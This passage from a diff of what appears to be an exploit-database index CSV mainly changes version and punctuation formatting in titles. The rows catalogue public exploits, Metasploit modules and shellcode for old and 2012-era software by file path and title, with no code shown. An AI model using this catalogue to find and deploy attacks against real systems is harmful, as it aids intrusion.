Overflow",1999-09-27,"Shane Hird",windows,remote,0 19516,platforms/windows/local/19516.txt,"Microsoft MSN Messenger Service 1.0 Setup BBS ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,local,0 19517,platforms/linux/local/19517.pl,"Emesene 2.12.5 Password Disclosure",2012-07-01,"Daniel Godoy",linux,local,0 -19519,platforms/windows/local/19519.rb,"Irfanview JPEG2000 <= v4.3.2.0 jp2 Stack Buffer Overflow",2012-07-01,metasploit,windows,local,0 +19519,platforms/windows/local/19519.rb,"Irfanview JPEG2000 <= 4.3.2.0 - jp2 Stack Buffer Overflow",2012-07-01,metasploit,windows,local,0 19520,platforms/bsd/remote/19520.txt,"BSD telnetd Remote Root Exploit",2012-07-01,Kingcope,bsd,remote,0 19521,platforms/windows/remote/19521.txt,"MS IE 5.0/4.0.1 hhopen OLE Control Buffer Overflow Vulnerability",1999-09-27,"Shane Hird",windows,remote,0 -19522,platforms/linux/remote/19522.txt,"Linux kernel 2.2 Predictable TCP Initial Sequence Number Vulnerability",1999-09-27,"Stealth and S. Krahmer",linux,remote,0 +19522,platforms/linux/remote/19522.txt,"Linux kernel 2.2 Predictable TCP Initial Sequence Number Vulnerability",1999-09-27,"Stealth and S. Krahmer",linux,remote,0 19523,platforms/linux/local/19523.txt,"python-wrapper Untrusted Search Path/Code Execution Vulnerability",2012-07-02,ShadowHatesYou,linux,local,0 19524,platforms/php/webapps/19524.txt,"WordPress Backup Plugin 2.0.1 Information Disclosure",2012-07-02,"Stephan Knauss",php,webapps,0 19525,platforms/windows/webapps/19525.txt,"IIS Short File/Folder Name Disclosure",2012-07-02,"Soroush Dalili",windows,webapps,0 @@ -16880,7 +16880,7 @@ id,file,description,date,author,platform,type,port 19532,platforms/aix/remote/19532.pl,"IBM AIX <= 4.3.2 ftpd Remote Buffer Overflow",1999-09-28,Gerrie,aix,remote,0 19533,platforms/solaris/local/19533.c,"Solaris <= 7.0 ufsdump Local Buffer Overflow Vulnerability (1)",1998-04-23,smm,solaris,local,0 19534,platforms/solaris/local/19534.c,"Solaris <= 7.0 ufsdump Local Buffer Overflow Vulnerability (2)",1998-12-30,"Cheez Whiz",solaris,local,0 -19535,platforms/hp-ux/local/19535.pl,"HP-UX <= 10.20 newgrp Vulnerability",1996-12-01,SOD,hp-ux,local,0 +19535,platforms/hp-ux/local/19535.pl,"HP-UX <= 10.20 newgrp Vulnerability",1996-12-01,SOD,hp-ux,local,0 19536,platforms/multiple/dos/19536.txt,"Apache <= 1.1,NCSA httpd <= 1.5.2,Netscape Server 1.12/1.1/2.0 a nph-test-cgi Vulnerability",1996-12-10,"Josh Richards",multiple,dos,0 19537,platforms/windows/remote/19537.txt,"TeamShare TeamTrack 3.0 Directory Traversal Vulnerability",1999-10-02,"rain forest puppy",windows,remote,0 19538,platforms/hardware/remote/19538.txt,"Hybrid Networks Cable Broadband Access System 1.0 Remote Configuration Vulnerability",1999-10-05,KSR[T],hardware,remote,0 @@ -16908,9 +16908,9 @@ id,file,description,date,author,platform,type,port 19560,platforms/multiple/remote/19560.c,"Washington University wu-ftpd 2.5 .0 message Buffer Overflow Vulnerability",1999-10-19,typo/teso,multiple,remote,0 19561,platforms/windows/remote/19561.c,"True North Software Internet Anywhere Mail Server 2.3.x Mail Server Multiple Buffer Overflow",1999-10-01,"Arne Vidstrom",windows,remote,0 19562,platforms/windows/dos/19562.pl,"MediaHouse Software Statistics Server 4.28/5.1 ""Server ID"" Buffer Overflow Vulnerability",1999-09-30,"Per Bergehed",windows,dos,0 -19563,platforms/windows/dos/19563.txt,"Photodex ProShow Producer v5.0.3256 Buffer Overflow",2012-07-03,"Julien Ahrens",windows,dos,0 +19563,platforms/windows/dos/19563.txt,"Photodex ProShow Producer 5.0.3256 - Buffer Overflow",2012-07-03,"Julien Ahrens",windows,dos,0 19564,platforms/bsd/dos/19564.c,"Axent Raptor 6.0 Denial of Service Vulnerability",1999-10-21,MSG.Net,bsd,dos,0 -19565,platforms/linux/local/19565.sh,"S.u.S.E. Linux 6.1/6.2 cwdtools Vulnerabilities",1999-10-22,"Brock Tellier",linux,local,0 +19565,platforms/linux/local/19565.sh,"S.u.S.E. Linux 6.1/6.2 cwdtools Vulnerabilities",1999-10-22,"Brock Tellier",linux,local,0 19566,platforms/windows/remote/19566.c,"Omnicron OmniHTTPD 1.1/2.4 Pro Buffer Overflow Vulnerability",1999-10-22,UNYUN,windows,remote,0 19567,platforms/linux/remote/19567.txt,"National Science Foundation Squid Web Proxy 1.0/1.1/2.1 Authentication Failure",1999-10-25,"Oezguer Kesim",linux,remote,0 19568,platforms/windows/remote/19568.txt,"Pacific Software URL Live! 1.0 Directory Traversal Vulnerability",1999-10-28,UNYUN,windows,remote,0 @@ -16941,9 +16941,9 @@ id,file,description,date,author,platform,type,port 19594,platforms/windows/local/19594.txt,"MS Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 Spoolss.exe DLL Insertion Vulnerability",1999-11-04,"Marc of eEye",windows,local,0 19595,platforms/windows/remote/19595.c,"Computer Software Manufaktur Alibaba 2.0 Multiple CGI Vulnerabilties",1999-11-03,Kerb,windows,remote,0 19596,platforms/windows/remote/19596.txt,"Byte Fusion BFTelnet 1.1 Long Username DoS Vulnerability",1999-11-03,"Ussr Labs",windows,remote,0 -19597,platforms/php/webapps/19597.txt,"GuestBook Scripts PHP v1.5 - Multiple Vulnerabilities",2012-07-05,Vulnerability-Lab,php,webapps,0 -19598,platforms/php/webapps/19598.txt,"Freeside SelfService CGI|API 2.3.3 - Multiple Vulnerabilities",2012-07-05,Vulnerability-Lab,php,webapps,0 -19600,platforms/php/webapps/19600.txt,"CLscript CMS v3.0 Multiple Vulnerabilities",2012-07-05,Vulnerability-Lab,php,webapps,0 +19597,platforms/php/webapps/19597.txt,"GuestBook Scripts PHP 1.5 - Multiple Vulnerabilities",2012-07-05,Vulnerability-Lab,php,webapps,0 +19598,platforms/php/webapps/19598.txt,"Freeside SelfService CGI/API 2.3.3 - Multiple Vulnerabilities",2012-07-05,Vulnerability-Lab,php,webapps,0 +19600,platforms/php/webapps/19600.txt,"CLscript CMS 3.0 - Multiple Vulnerabilities",2012-07-05,Vulnerability-Lab,php,webapps,0 19601,platforms/windows/remote/19601.txt,"Etype Eserv 2.50 Directory Traversal Vulnerability",1999-11-04,"Ussr Labs",windows,remote,0 19602,platforms/linux/local/19602.c,"Eric Allman Sendmail 8.8 .x Socket Hijack Vulnerability",1999-11-05,"Michal Zalewski",linux,local,0 19603,platforms/windows/remote/19603.txt,"MS IE 4.x/5.0,Outlook 2000 0/98 0/Express 4.x ActiveX CAB File Execution",1999-11-08,Mukund,windows,remote,0 @@ -16953,7 +16953,7 @@ id,file,description,date,author,platform,type,port 19609,platforms/freebsd/local/19609.txt,"Muhammad M. Saggaf Seyon 2.14 b Relative Path Vulnerability",1999-11-08,"Shawn Hillis",freebsd,local,0 19610,platforms/windows/local/19610.c,"Irfan Skiljan IrfanView32 3.0.7 Image File Buffer Overflow Vulnerability",1999-11-09,UNYUN,windows,local,0 19611,platforms/windows/remote/19611.txt,"TransSoft Broker FTP Server 3.0 x/4.0 User Name Buffer Overflow Vulnerability",1999-11-08,"Ussr Labs",windows,remote,0 -19612,platforms/windows/remote/19612.pl,"Trend Micro InterScan VirusWall 3.2.3/3.3 Long HELO Buffer Overflow Vulnerability (1)",1999-11-07,"Alain Thivillon & Stephane Aubert",windows,remote,0 +19612,platforms/windows/remote/19612.pl,"Trend Micro InterScan VirusWall 3.2.3/3.3 Long HELO Buffer Overflow Vulnerability (1)",1999-11-07,"Alain Thivillon & Stephane Aubert",windows,remote,0 19613,platforms/windows/remote/19613.rb,"Poison Ivy 2.3.2 C&C Server Buffer Overflow",2012-07-06,metasploit,windows,remote,3460 19614,platforms/windows/remote/19614.asm,"Trend Micro InterScan VirusWall 3.2.3/3.3 Long HELO Buffer Overflow Vulnerability (2)",1999-11-07,"dark spyrit",windows,remote,0 19615,platforms/unix/remote/19615.c,"ISC BIND <= 8.2.2,IRIX <= 6.5.17,Solaris 7.0 (NXT Overflow & Denial of Service) Vulnerabilities",1999-11-10,"ADM Crew",unix,remote,0 @@ -16968,7 +16968,7 @@ id,file,description,date,author,platform,type,port 19624,platforms/windows/dos/19624.txt,"Gene6 G6 FTP Server 2.0 Buffer Overflow DoS Vulnerability",1999-11-17,"Ussr Labs",windows,dos,0 19625,platforms/windows/remote/19625.py,"ALLMediaServer 0.8 SEH Overflow Exploit",2012-07-06,"motaz reda",windows,remote,888 19626,platforms/php/webapps/19626.txt,"sflog! <= 1.00 Multiple Vulnerabilities",2012-07-06,dun,php,webapps,0 -19628,platforms/php/webapps/19628.txt,"Event Script PHP v1.1 CMS Multiple Vulnerabilities",2012-07-06,Vulnerability-Lab,php,webapps,0 +19628,platforms/php/webapps/19628.txt,"Event Script PHP 1.1 CMS - Multiple Vulnerabilities",2012-07-06,Vulnerability-Lab,php,webapps,0 19629,platforms/php/webapps/19629.txt,"Webmatic 3.1.1 Blind SQL Injection",2012-07-06,"High-Tech Bridge SA",php,webapps,0 19630,platforms/php/webapps/19630.rb,"Tiki Wiki <= 8.3 unserialize() PHP Code Execution",2012-07-09,metasploit,php,webapps,0 19631,platforms/php/webapps/19631.rb,"Basilic 1.5.14 diff.php Arbitrary Command Execution",2012-07-09,metasploit,php,webapps,0 @@ -17002,12 +17002,12 @@ id,file,description,date,author,platform,type,port 19659,platforms/sco/local/19659.sh,"SCO Unixware 7.0/7.0.1/7.1/7.1.1 'coredump' Symlink Vulnerability",1999-12-03,"Brock Tellier",sco,local,0 19660,platforms/sco/local/19660.c,"SCO Unixware 7.1 pkgcat Buffer Overflow",1999-12-06,"Brock Tellier",sco,local,0 19661,platforms/sco/local/19661.c,"SCO Unixware 7.1 pkginstall Buffer Overflow",1999-12-06,"Brock Tellier",sco,local,0 -19662,platforms/windows/remote/19662.txt,"Internet Explorer 4.1/5.0/4.0.1 Subframe Spoofing Vulnerability",1999-11-30,"Georgi Guninski",windows,remote,0 +19662,platforms/windows/remote/19662.txt,"Internet Explorer 4.1/5.0/4.0.1 Subframe Spoofing Vulnerability",1999-11-30,"Georgi Guninski",windows,remote,0 19663,platforms/solaris/remote/19663.c,"Solaris 2.3/2.4/2.5/2.5.1/2.6/7.0 snoop (print_domain_name) Buffer Overflow Vulnerability",1999-12-07,k2,solaris,remote,0 19664,platforms/windows/remote/19664.txt,"Cat Soft Serv-U 2.5 a Server SITE PASS DoS Vulnerability",1999-12-02,"Ussr Labs",windows,remote,0 19665,platforms/windows/local/19665.txt,"Internet Explorer 5.0 vnd.ms.radio URL Vulnerability",1999-12-06,"Jeremy Kothe",windows,local,0 19666,platforms/windows/dos/19666.txt,"GoodTech Telnet Server NT 2.2.1 DoS Vulnerability",1999-12-06,"Ussr Labs",windows,dos,0 -19667,platforms/multiple/remote/19667.c,"WolfPack Development XSHIPWARS 1.0/1.2.4 Buffer Overflow Vulnerability",1999-12-09,"Amanda Woodward",multiple,remote,0 +19667,platforms/multiple/remote/19667.c,"WolfPack Development XSHIPWARS 1.0/1.2.4 Buffer Overflow Vulnerability",1999-12-09,"Amanda Woodward",multiple,remote,0 19668,platforms/solaris/remote/19668.c,"Solaris 2.5/2.5.1/2.6/7.0 sadmind Buffer Overflow Vulnerability (1)",1999-06-24,"Cheez Whiz",solaris,remote,0 19669,platforms/solaris/remote/19669.c,"Solaris 2.5/2.5.1/2.6/7.0 sadmind Buffer Overflow Vulnerability (2)",1999-06-24,"Cheez Whiz",solaris,remote,0 19670,platforms/solaris/remote/19670.c,"Solaris 2.5/2.5.1/2.6/7.0 sadmind Buffer Overflow Vulnerability (3)",2000-11-10,"nikolai abromov",solaris,remote,0 @@ -17055,7 +17055,7 @@ id,file,description,date,author,platform,type,port 19712,platforms/multiple/remote/19712.txt,"Allaire ColdFusion Server 4.0/4.0.1 CFCACHE Vulnerability",2000-01-04,Anonymous,multiple,remote,0 19713,platforms/cgi/remote/19713.pl,"Solution Scripts Home Free 1.0 search.cgi Directory Traversal Vulnerability",2000-01-03,"k0ad k1d",cgi,remote,0 19714,platforms/php/webapps/19714.txt,"Netsweeper WebAdmin Portal Multiple Vulnerabilities",2012-07-10,"Jacob Holcomb",php,webapps,0 -19715,platforms/php/webapps/19715.txt,"WordPress WP-Predict Plugin v1.0 Blind SQL Injection",2012-07-10,"Chris Kellum",php,webapps,0 +19715,platforms/php/webapps/19715.txt,"WordPress WP-Predict Plugin 1.0 - Blind SQL Injection",2012-07-10,"Chris Kellum",php,webapps,0 19716,platforms/windows/dos/19716.txt,"Checkpoint Abra Multiple Vulnerabilities",2012-07-10,"Andrey Komarov",windows,dos,0 19717,platforms/java/remote/19717.rb,"Java Applet Field Bytecode Verifier Cache Remote Code Execution",2012-07-11,metasploit,java,remote,0 19718,platforms/windows/remote/19718.rb,"AdminStudio LaunchHelp.dll ActiveX Arbitrary Code Execution",2012-07-11,metasploit,windows,remote,0 @@ -17066,7 +17066,7 @@ id,file,description,date,author,platform,type,port 19723,platforms/linux/local/19723.txt,"Corel Linux OS 1.0 get_it PATH Vulnerability",2000-01-12,"Cesar Tascon Alvarez",linux,local,0 19724,platforms/windows/remote/19724.txt,"Mirabilis ICQ 0.99 b 1.1.1.1/3.19 Remote Buffer Overflow Vulnerability",2000-01-12,"Drew Copley",windows,remote,0 19725,platforms/windows/dos/19725.txt,"Nosque Workshop MsgCore 1.9 Denial of Service Vulnerability",2000-01-13,"Ussr Labs",windows,dos,0 -19726,platforms/bsd/local/19726.c,"FreeBSD <= 3.4,NetBSD <= 1.4.1,OpenBSD <= 2.6 /proc File Sytem Vulnerability",2000-01-21,Nergal,bsd,local,0 +19726,platforms/bsd/local/19726.c,"FreeBSD <= 3.4,NetBSD <= 1.4.1,OpenBSD <= 2.6 /proc File Sytem Vulnerability",2000-01-21,Nergal,bsd,local,0 19727,platforms/linux/local/19727.c,"Inter7 vpopmail (vchkpw) <= 3.4.11 Buffer Overflow Vulnerability",2000-01-21,k2,linux,local,0 19728,platforms/windows/local/19728.txt,"Microsoft Systems Management Server 2.0 Default Permissions Vulnerability",1999-12-29,"Frank Monroe",windows,local,0 19729,platforms/linux/remote/19729.c,"Qualcomm qpopper 3.0 'LIST' Buffer Overflow Vulnerability",2000-01-10,Zhodiac,linux,remote,0 @@ -17108,11 +17108,11 @@ id,file,description,date,author,platform,type,port 19766,platforms/hardware/dos/19766.txt,"Nortel Networks Nautica Marlin Denial of Service Vulnerablility",2000-02-25,"Christophe GRENIER",hardware,dos,0 19768,platforms/php/webapps/19768.txt,"House Style 0.1.2 => readfile() Local File Disclosure Vulnerability",2012-07-12,GoLd_M,php,webapps,0 19769,platforms/php/webapps/19769.txt,"eCan v0.1 => Local File Disclosure Vulnerability",2012-07-12,GoLd_M,php,webapps,0 -19771,platforms/php/webapps/19771.txt,"Lc Flickr Carousel V1.0 => Local File Disclosure Vulnerability",2012-07-12,GoLd_M,php,webapps,0 -19772,platforms/windows/dos/19772.txt,"WaveSurfer 1.8.8p4 <= Memory Corruption PoC",2012-07-12,"Jean Pascal Pereira",windows,dos,0 -19774,platforms/hardware/webapps/19774.txt,"TP Link Gateway v3.12.4 Multiple Vulnerabilities",2012-07-12,Vulnerability-Lab,hardware,webapps,0 -19775,platforms/php/webapps/19775.txt,"Reserve Logic v1.2 Booking CMS Multiple Vulnerabilities",2012-07-12,Vulnerability-Lab,php,webapps,0 -19776,platforms/windows/local/19776.pl,"ZipItFast PRO v3.0 Heap Overflow Exploit",2012-07-12,b33f,windows,local,0 +19771,platforms/php/webapps/19771.txt,"Lc Flickr Carousel 1.0 => - Local File Disclosure Vulnerability",2012-07-12,GoLd_M,php,webapps,0 +19772,platforms/windows/dos/19772.txt,"WaveSurfer 1.8.8p4 - Memory Corruption PoC",2012-07-12,"Jean Pascal Pereira",windows,dos,0 +19774,platforms/hardware/webapps/19774.txt,"TP Link Gateway 3.12.4 - Multiple Vulnerabilities",2012-07-12,Vulnerability-Lab,hardware,webapps,0 +19775,platforms/php/webapps/19775.txt,"Reserve Logic 1.2 - Booking CMS Multiple Vulnerabilities",2012-07-12,Vulnerability-Lab,php,webapps,0 +19776,platforms/windows/local/19776.pl,"ZipItFast PRO 3.0 - Heap Overflow Exploit",2012-07-12,b33f,windows,local,0 19777,platforms/windows/dos/19777.txt,"IE9, SharePoint, Lync toStaticHTML HTML Sanitizing Bypass",2012-07-12,"Adi Cohen",windows,dos,0 19778,platforms/linux/local/19778.c,"RedHat 4.x/5.x/6.x,RedHat man 1.5,Turbolinux man 1.5,Turbolinux 3.5/4.x man Buffer Overrun (1)",2000-02-26,"Babcia Padlina",linux,local,0 19779,platforms/linux/local/19779.c,"RedHat 4.x/5.x/6.x,RedHat man 1.5,Turbolinux man 1.5,Turbolinux 3.5/4.x man Buffer Overrun (2)",2000-02-26,"Babcia Padlina",linux,local,0 @@ -17127,7 +17127,7 @@ id,file,description,date,author,platform,type,port 19788,platforms/irix/remote/19788.pl,"SGI InfoSearch 1.0,SGI IRIX 6.5.x fname Vulnerability",2000-03-05,rpc,irix,remote,0 19789,platforms/windows/local/19789.txt,"Microsoft Clip Art Gallery 5.0 Buffer Overflow Vulnerability",2000-03-06,dildog,windows,local,0 19790,platforms/php/webapps/19790.txt,"WebPagetest <= 2.6 Multiple Vulnerabilities",2012-07-13,dun,php,webapps,0 -19791,platforms/php/webapps/19791.txt,"WordPress Resume Submissions & Job Postings v2.5.1 Unrestricted File Upload",2012-07-13,"Chris Kellum",php,webapps,0 +19791,platforms/php/webapps/19791.txt,"WordPress Resume Submissions & Job Postings 2.5.1 - Unrestricted File Upload",2012-07-13,"Chris Kellum",php,webapps,0 19792,platforms/php/webapps/19792.txt,"Joomla KISS Advertiser Remote File & Bypass Upload Vulnerability",2012-07-13,D4NB4R,php,webapps,0 19793,platforms/php/webapps/19793.txt,"Magento eCommerce Local File Disclosure",2012-07-13,"SEC Consult",php,webapps,0 19794,platforms/linux/local/19794.txt,"Oracle8i Standard Edition 8.1.5 for Linux Installer Vulnerability",2000-03-05,"Keyser Soze",linux,local,0 @@ -17197,7 +17197,7 @@ id,file,description,date,author,platform,type,port 19862,platforms/php/webapps/19862.pl,"Wordpress Diary/Notebook Site5 Theme Email Spoofing",2012-07-16,bwall,php,webapps,0 19863,platforms/php/webapps/19863.txt,"CakePHP 2.x-2.2.0-RC2 XXE Injection",2012-07-16,"Pawel h0wl Wylecial",php,webapps,0 19864,platforms/php/webapps/19864.txt,"VamCart v0.9 CMS - Multiple Vulnerabilities",2012-07-16,Vulnerability-Lab,php,webapps,0 -19865,platforms/php/webapps/19865.txt,"PBBoard v2.1.4 CMS - Multiple Vulnerabilities",2012-07-16,Vulnerability-Lab,php,webapps,0 +19865,platforms/php/webapps/19865.txt,"PBBoard 2.1.4 - CMS Multiple Vulnerabilities",2012-07-16,Vulnerability-Lab,php,webapps,0 19866,platforms/windows/dos/19866.pl,"DomsHttpd <= 1.0 Remote Denial Of Service Exploit",2012-07-16,"Jean Pascal Pereira",windows,dos,0 19867,platforms/linux/local/19867.txt,"S.u.S.E. Linux 6.x Arbitrary File Deletion Vulnerability",2000-04-21,Peter_M,linux,local,0 19868,platforms/linux/remote/19868.c,"LCDProc 0.4 Buffer Overflow Vulnerability",2000-04-23,"Andrew Hobgood",linux,remote,0 @@ -17209,8 +17209,8 @@ id,file,description,date,author,platform,type,port 19874,platforms/solaris/local/19874.c,"Solaris 2.6/7.0 lpset -r Buffer Overflow Vulnerability (3)",2000-04-24,"Theodor Ragnar Gislason",solaris,local,0 19875,platforms/immunix/local/19875.txt,"PostgreSQL 6.3.2/6.5.3 Cleartext Passwords Vulnerability",2000-04-23,"Robert van der Meulen",immunix,local,0 19876,platforms/solaris/local/19876.c,"Solaris 7.0/8 Xsun Buffer Overrun Vulnerability",2000-04-24,DiGiT,solaris,local,0 -19877,platforms/windows/remote/19877.txt,"FrontPage 98/Personal WebServer 1.0,Personal Web Server 2.0 htimage.exe File Existence Disclosure",2000-04-19,Narrow,windows,remote,0 -19878,platforms/solaris/local/19878.c,"Solaris 2.6/7.0 lp -d Option Buffer Overflow Vulnerability",2000-04-24,DiGiT,solaris,local,0 +19877,platforms/windows/remote/19877.txt,"FrontPage 98/Personal WebServer 1.0,Personal Web Server 2.0 htimage.exe File Existence Disclosure",2000-04-19,Narrow,windows,remote,0 +19878,platforms/solaris/local/19878.c,"Solaris 2.6/7.0 lp -d Option Buffer Overflow Vulnerability",2000-04-24,DiGiT,solaris,local,0 19879,platforms/linux/remote/19879.txt,"RedHat 6.2 Piranha Virtual Server Package Default Account and Password Vulnerability",2000-04-24,"Max Vision",linux,remote,0 19880,platforms/windows/dos/19880.txt,"Symantec pcAnywhere 8.0.1/8.0.2/9.0/9.2 Port Scan DoS Vulnerability",2000-04-25,Vacuum,windows,dos,0 19881,platforms/windows/remote/19881.txt,"McMurtrey/Whitaker & Associates Cart32 2.6/3.0 Remote Administration Password Vulnerability",2000-04-27,"Cerberus Security Team",windows,remote,0 @@ -17226,7 +17226,7 @@ id,file,description,date,author,platform,type,port 19891,platforms/linux/remote/19891.c,"Ethereal 0.8.4/0.8.5/0.8.6,tcpdump 3.4/3.5 alpha DNS Decode Vulnerability (1)",1999-05-31,"Hugo Breton",linux,remote,0 19892,platforms/linux/remote/19892.txt,"Ethereal 0.8.4/0.8.5/0.8.6,tcpdump 3.4/3.5 alpha DNS Decode Vulnerability (2)",1999-05-31,scut,linux,remote,0 19893,platforms/windows/remote/19893.c,"L-Soft Listserv 1.8 Web Archives Buffer Overflow Vulnerability",2000-05-01,"David Litchfield",windows,remote,0 -19894,platforms/windows/local/19894.txt,"Aladdin Knowledge Systems eToken 3.3.3 eToken PIN Extraction Vulnerability",2000-05-04,kingpin,windows,local,0 +19894,platforms/windows/local/19894.txt,"Aladdin Knowledge Systems eToken 3.3.3 eToken PIN Extraction Vulnerability",2000-05-04,kingpin,windows,local,0 19895,platforms/windows/remote/19895.txt,"NetWin DNews 5.3 Server Buffer Overflow Vulnerability",2000-03-01,Joey__,windows,remote,0 19896,platforms/bsd/dos/19896.c,"FreeBSD 3.4/4.0/5.0,NetBSD 1.4 Unaligned IP Option Denial of Service",2000-05-04,y3t1,bsd,dos,0 19897,platforms/windows/remote/19897.txt,"FrontPage 2000,IIS 4.0/5.0 Server Extensions Path Disclosure Vulnerability",2000-05-06,"Frankie Zie",windows,remote,0 @@ -17258,7 +17258,7 @@ id,file,description,date,author,platform,type,port 19924,platforms/bsd/remote/19924.c,"Cygnus Network Security 4.0/KerbNet 5.0,MIT Kerberos 4/5,RedHat 6.2 Compatibility krb_rd_req() Buffer Overflow (1)",2000-05-16,duke,bsd,remote,0 19925,platforms/linux/local/19925.c,"Cygnus Network Security 4.0/KerbNet 5.0,MIT Kerberos 4/5,RedHat 6.2 Compatibility krb_rd_req() Buffer Overflow (2)",2000-05-26,"Jim Paris",linux,local,0 19926,platforms/linux/remote/19926.c,"Cygnus Network Security 4.0/KerbNet 5.0,MIT Kerberos 4/5,RedHat 6.2 Compatibility krb_rd_req() Buffer Overflow (3)",2000-04-08,"Jim Paris",linux,remote,0 -19927,platforms/php/webapps/19927.html,"Nwahy Articles v2.2 CSRF Add Admin",2012-07-18,DaOne,php,webapps,0 +19927,platforms/php/webapps/19927.html,"Nwahy Articles 2.2 - CSRF Add Admin",2012-07-18,DaOne,php,webapps,0 19928,platforms/windows/remote/19928.txt,"Microsoft Active Movie Control 1.0 Filetype Vulnerability",2000-05-13,http-equiv,windows,remote,0 19930,platforms/windows/local/19930.rb,"Windows Escalate Task Scheduler XML Privilege Escalation",2012-07-19,metasploit,windows,local,0 19931,platforms/windows/remote/19931.rb,"Novell ZENworks Configuration Management Preboot Service 0x06 Buffer Overflow",2012-07-19,metasploit,windows,remote,998 @@ -17362,7 +17362,7 @@ id,file,description,date,author,platform,type,port 20032,platforms/lin_x86/remote/20032.txt,"wu-ftpd 2.4.2/2.5 .0/2.6 .0 Remote Format String Stack Overwrite (3)",2001-05-04,justme,lin_x86,remote,0 20033,platforms/php/webapps/20033.py,"Dell SonicWALL Scrutinizer 9.0.1 (statusFilter.php q parameter) SQL Injection",2012-07-22,muts,php,webapps,0 20035,platforms/asp/webapps/20035.js,"Ipswitch WhatsUp Gold 15.02 Stored XSS - Blind SQLi - RCE",2012-07-22,muts,asp,webapps,0 -20036,platforms/windows/local/20036.pl,"Photodex ProShow Producer v5.0.3256 Local Buffer Overflow Exploit",2012-07-23,mr.pr0n,windows,local,0 +20036,platforms/windows/local/20036.pl,"Photodex ProShow Producer 5.0.3256 - Local Buffer Overflow Exploit",2012-07-23,mr.pr0n,windows,local,0 20037,platforms/linux/webapps/20037.txt,"Atmail WebAdmin and Webmail Control Panel SQL Root Password Disclosure",2012-07-23,Ciph3r,linux,webapps,0 20038,platforms/linux/webapps/20038.py,"Symantec Web Gateway 5.0.2 (blocked.php id parameter) Blind SQL Injection",2012-07-23,muts,linux,webapps,0 20039,platforms/windows/dos/20039.java,"LeafDigital LeafChat 1.7 DoS Vulnerability",2000-06-25,"MDMA Crew",windows,dos,0 @@ -17434,7 +17434,7 @@ id,file,description,date,author,platform,type,port 20107,platforms/unix/local/20107.txt,"CVS Kit CVS Server 1.10 .8 Instructed File Create Vulnerability",2000-07-28,"Tanaka Akira",unix,local,0 20108,platforms/unix/local/20108.txt,"CVS Kit CVS Server 1.10 .8 Checkin.prog Binary Execution Vulnerability",2000-06-28,"Tanaka Akira",unix,local,0 20109,platforms/windows/local/20109.rb,"Photodex ProShow Producer 5.0.3256 load File Handling Buffer Overflow",2012-07-27,metasploit,windows,local,0 -20111,platforms/php/webapps/20111.rb,"CuteFlow v2.11.2 Arbitrary File Upload Vulnerability",2012-07-27,metasploit,php,webapps,0 +20111,platforms/php/webapps/20111.rb,"CuteFlow 2.11.2 - Arbitrary File Upload Vulnerability",2012-07-27,metasploit,php,webapps,0 20112,platforms/windows/remote/20112.rb,"Cisco Linksys PlayerPT ActiveX Control Buffer Overflow",2012-07-27,metasploit,windows,remote,0 20113,platforms/linux/remote/20113.rb,"Symantec Web Gateway 5.0.2.18 pbcontrol.php Command Injection",2012-07-27,metasploit,linux,remote,0 20116,platforms/windows/local/20116.py,"Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 Buffer Overflow (ASLR and DEP Bypass)",2012-07-27,"Ptrace Security",windows,local,0 @@ -17488,7 +17488,7 @@ id,file,description,date,author,platform,type,port 20168,platforms/php/remote/20168.pl,"pBot Remote Code Execution",2012-08-01,bwall,php,remote,0 20170,platforms/php/webapps/20170.txt,"Joomla Movm Extension (com_movm) SQL Injection",2012-08-01,D4NB4R,php,webapps,0 20171,platforms/php/webapps/20171.txt,"ManageEngine Application Manager 10 Multiple Vulnerabilities",2012-08-01,Vulnerability-Lab,php,webapps,0 -20172,platforms/php/webapps/20172.txt,"ManageEngine Mobile Application Manager v10 SQL Injection",2012-08-01,Vulnerability-Lab,php,webapps,0 +20172,platforms/php/webapps/20172.txt,"ManageEngine Mobile Application Manager 10 - SQL Injection",2012-08-01,Vulnerability-Lab,php,webapps,0 20173,platforms/php/webapps/20173.rb,"WebPageTest Arbitrary PHP File Upload",2012-08-02,metasploit,php,webapps,0 20174,platforms/windows/remote/20174.rb,"Microsoft Internet Explorer Fixed Table Col Span Heap Overflow",2012-08-02,metasploit,windows,remote,0 20175,platforms/windows/dos/20175.pl,"PragmaSys TelnetServer 2000 rexec Buffer Overflow Vulnerability",2000-08-24,"Ussr Labs",windows,dos,0 @@ -17514,7 +17514,7 @@ id,file,description,date,author,platform,type,port 20195,platforms/lin_x86/shellcode/20195.c,"Linux x86 ASLR deactivation - 83 bytes",2012-08-02,"Jean Pascal Pereira",lin_x86,shellcode,0 20196,platforms/lin_x86/shellcode/20196.c,"Linux x86 chmod 666 /etc/passwd & /etc/shadow - 57 bytes",2012-08-02,"Jean Pascal Pereira",lin_x86,shellcode,0 20197,platforms/php/webapps/20197.txt,"Joomla joomgalaxy 1.2.0.4 Multiple Vulnerabilities",2012-08-02,D4NB4R,php,webapps,0 -20198,platforms/php/webapps/20198.txt,"am4ss 1.2 <= Multiple Vulnerabilities",2012-08-02,s3n4t00r,php,webapps,0 +20198,platforms/php/webapps/20198.txt,"am4ss <= 1.2 - Multiple Vulnerabilities",2012-08-02,s3n4t00r,php,webapps,0 20199,platforms/php/webapps/20199.php,"am4ss Support System 1.2 PHP Code Injection Exploit",2012-08-02,i-Hmx,php,webapps,0 20201,platforms/linux/local/20201.c,"Nvidia Linux Driver Privilege Escalation",2012-08-02,Anonymous,linux,local,0 20202,platforms/windows/remote/20202.rb,"Cisco Linksys PlayerPT ActiveX Control SetSource sURL argument Buffer Overflow",2012-08-03,metasploit,windows,remote,0 @@ -17580,12 +17580,12 @@ id,file,description,date,author,platform,type,port 20266,platforms/windows/remote/20266.txt,"MS Virtual Machine 2000/3100/3200/3300 Series com.ms.activeX.ActiveXComponent Arbitrary Program Execution",2000-10-05,"Marcin Jackowski",windows,remote,0 20268,platforms/php/webapps/20268.txt,"Tickets CAD 2.20G Multiple Vulnerabilities",2012-08-05,chap0,php,webapps,0 20269,platforms/windows/remote/20269.txt,"Microsoft IIS 5.0 Indexed Directory Disclosure Vulnerability",2000-10-04,"David Litchfield",windows,remote,0 -20270,platforms/php/webapps/20270.txt,"WP Effective Lead Management v3.0.0 Persistent XSS",2012-08-05,"Chris Kellum",php,webapps,0 +20270,platforms/php/webapps/20270.txt,"WP Effective Lead Management 3.0.0 - Persistent XSS",2012-08-05,"Chris Kellum",php,webapps,0 20271,platforms/openbsd/dos/20271.c,"OpenBSD 2.x Pending ARP Request Remote DoS 